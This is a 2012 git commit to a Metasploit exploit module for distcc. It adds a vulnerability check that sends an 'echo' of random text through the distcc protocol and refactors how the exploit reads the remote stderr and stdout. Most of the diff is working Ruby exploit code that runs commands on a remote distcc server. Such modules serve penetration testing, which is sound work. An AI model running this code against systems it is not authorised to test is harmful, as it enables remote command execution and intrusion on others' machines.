Add a check for distcc_exec

Just executes the exploit with an "echo <random>" payload to see if it
works.
unstable
James Lee 2012-06-18 14:34:02 -06:00
parent 68496d364a
commit 96c16a498a
1 changed files with 35 additions and 12 deletions

View File

@ -63,6 +63,21 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class) ], self.class)
end end
def check
r = rand_text_alphanumeric(10)
connect
sock.put(dist_cmd("sh", "-c", "echo #{r}"))
dtag = rand_text_alphanumeric(10)
sock.put("DOTI0000000A#{dtag}\n")
err, out = read_output
if out.index(r)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit def exploit
connect connect
@ -72,6 +87,21 @@ class Metasploit3 < Msf::Exploit::Remote
dtag = rand_text_alphanumeric(10) dtag = rand_text_alphanumeric(10)
sock.put("DOTI0000000A#{dtag}\n") sock.put("DOTI0000000A#{dtag}\n")
err, out = read_output
(err || "").split("\n") do |line|
print_status("stderr: #{line}")
end
(out || "").split("\n") do |line|
print_status("stdout: #{line}")
end
handler
disconnect
end
def read_output
res = sock.get_once(24, 5) res = sock.get_once(24, 5)
if !(res and res.length == 24) if !(res and res.length == 24)
@ -85,12 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote
res = sock.get_once(8, 5) res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0] len = [res].pack("H*").unpack("N")[0]
return if not len return [nil, nil] if not len
if (len > 0) if (len > 0)
res = sock.get_once(len, 5) err = sock.get_once(len, 5)
res.split("\n").each do |line|
print_status("stderr: #{line}")
end
end end
# Check STDOUT # Check STDOUT
@ -98,16 +125,12 @@ class Metasploit3 < Msf::Exploit::Remote
res = sock.get_once(8, 5) res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0] len = [res].pack("H*").unpack("N")[0]
return if not len return [err, nil] if not len
if (len > 0) if (len > 0)
res = sock.get_once(len, 5) out = sock.get_once(len, 5)
res.split("\n").each do |line|
print_status("stdout: #{line}")
end
end end
return [err, out]
handler
disconnect
end end